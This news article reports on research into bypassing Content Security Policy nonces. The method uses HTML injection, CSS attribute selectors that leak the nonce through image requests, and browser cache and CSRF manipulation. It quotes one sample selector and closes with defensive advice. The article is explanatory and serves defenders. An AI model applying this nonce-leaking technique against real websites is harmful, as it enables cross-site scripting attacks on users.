Researchers Exploit HTML Injection to Bypass Content Security Policy

A sophisticated method to bypass Content Security Policy (CSP) nonces, a widely-used web security mechanism designed to prevent cross-site scripting (XSS) attacks.

The breakthrough technique exploits browser caching mechanisms combined with CSS injection to circumvent one of the web’s most trusted security features.

Content Security Policy serves as a critical defense layer that prevents malicious scripts from executing on websites by requiring scripts to include a unique, randomly generated “nonce” value.

This security measure has been considered highly effective because each page load generates a new nonce, making it theoretically impossible for attackers to predict or reuse these values.

The attack begins by exploiting HTML injection vulnerabilities to insert malicious CSS code that can extract nonce values from web pages.

Researchers discovered that while CSP effectively blocks unauthorized scripts, it often permits CSS stylesheets to load without restriction, creating an unexpected attack vector.

The technique uses CSS attribute selectors to systematically leak portions of the nonce value through background image requests.

By crafting CSS rules that match specific character combinations within the nonce, attackers can reconstruct the complete value through multiple HTTP requests.

For example, CSS selectors like script[nonce*="abc"] trigger network requests when they match parts of the nonce, allowing attackers to piece together the full string.

The final HTML we see loaded is still the first one that leaked using CSS (green), not our XSS (red)

“The nonce protection mechanism only applies to the nonce attribute itself, but the same value appears in other locations like the CSP meta tag content, which remains vulnerable to CSS-based extraction,” the researchers explained.

Content Security Policy

The most innovative aspect of this attack leverages browser caching mechanisms, specifically the interaction between back/forward cache (bfcache) and disk cache.

The researchers discovered that by manipulating browser navigation history, they could force pages to load from disk cache rather than making fresh requests to the server.

This caching behavior creates a critical window of opportunity: attackers can extract the nonce from a cached page while simultaneously updating the malicious payload through separate requests.

The technique exploits cache partitioning rules and uses Cross-Site Request Forgery (CSRF) attacks to modify user data between cache operations.

By carefully orchestrating the timing of page loads, history navigation, and cache invalidation, attackers can achieve a scenario where an old page with a known nonce loads from cache while fetching updated malicious content from the server.

The researchers successfully demonstrated the technique in a controlled environment and provided detailed proof-of-concept code.

Real-World Implications

Security professionals recommend implementing additional CSP directives beyond nonce-based protection, such as strict-dynamic policies and regular security audits of HTML injection points.

This research reveals significant implications for web application security. The attack requires two key preconditions: the ability to leak nonces through HTML injection and separate delivery of malicious payloads from nonce generation.

These conditions are surprisingly common in modern web applications that use asynchronous content loading.

Several cybersecurity experts have already begun testing the method against real-world applications, with some reporting successful bypasses of production CSP implementations.

The research underscores the importance of defense-in-depth strategies rather than relying solely on single security mechanisms.

This discovery represents a significant advancement in web security research and highlights the continuing evolution of attack techniques against modern browser security features.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.